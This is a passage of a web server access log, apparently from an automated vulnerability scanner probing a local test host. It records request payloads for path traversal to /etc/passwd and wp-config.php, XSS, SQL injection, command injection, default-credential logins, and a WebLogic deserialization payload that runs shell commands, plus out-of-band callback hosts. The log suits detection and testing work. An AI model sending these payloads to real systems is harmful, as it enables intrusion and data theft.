HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"userid=kevinlab&userpass=kevin003","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /dashboard/proc.php?type=login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.169","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/build.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/experimental/latest_runs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.169","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page=/etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"username=YWRtaW4=&password=YWRtaW4xMjM=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /service/rapture/session HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/build.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.172","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"--871a4a346a547cf05cb83f57b9ebcb83\x0D\x0AContent-Disposition: form-data; name=\x22files\x22; filename=\x22test.tar\x22\x0D\x0A\x0D\x0A../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar 00000000000000297MTtRc1eZyiQiTaGhb2lOUiz7\x0D\x0A--871a4a346a547cf05cb83f57b9ebcb83--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servlet/UploadServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resource/file%3a///etc/passwd/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/java.lang:type=Memory HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.175","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22option\x22\x0D\x0A\x0D\x0Acom_gmapfp\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22image1\x22; filename=\x22nuclei.html.gif\x22\x0D\x0AContent-Type: text/html\x0D\x0A\x0D\x0Aprojectdiscovery\x0D\x0A\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22no_html\x22\x0D\x0A\x0D\x0Ano_html\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.175","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/java.lang:type=Memory HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22option\x22\x0D\x0A\x0D\x0Acom_gmapfp\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22image1\x22; filename=\x22nuclei.html.gif\x22\x0D\x0AContent-Type: text/html\x0D\x0A\x0D\x0Aprojectdiscovery\x0D\x0A\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22no_html\x22\x0D\x0A\x0D\x0Ano_html\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rootDesc.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/53 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.195","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7ResultBaseExececho${IFS}COP-9272-9102-EVC|revconnectionHandlertrue]]>","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wls-wsat/CoordinatorPortType HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.180","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/54 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /STATE_ID/123/agentLogUploader HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.176","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?id=50&file=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /welcome HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/55 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"{\x0D\x0A \x22application_type\x22: \x22web\x22,\x0D\x0A \x22redirect_uris\x22: [\x22https://c9v8h8gsmpv8c1qg07h0i954dg6159itj.oast.fun/callback\x22],\x0D\x0A \x22client_name\x22: \x22127.0.0.1\x22,\x0D\x0A \x22logo_uri\x22: \x22https://c9v8h8gsmpv8c1qg07h04afk65xzsxhf5.oast.fun/favicon.ico\x22,\x0D\x0A \x22subject_type\x22: \x22pairwise\x22,\x0D\x0A \x22token_endpoint_auth_method\x22: \x22client_secret_basic\x22,\x0D\x0A \x22request_uris\x22: [\x22https://c9v8h8gsmpv8c1qg07h0815oiirfnx39g.oast.fun\x22]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /connect/register HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.182","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"username=root&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/luci/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 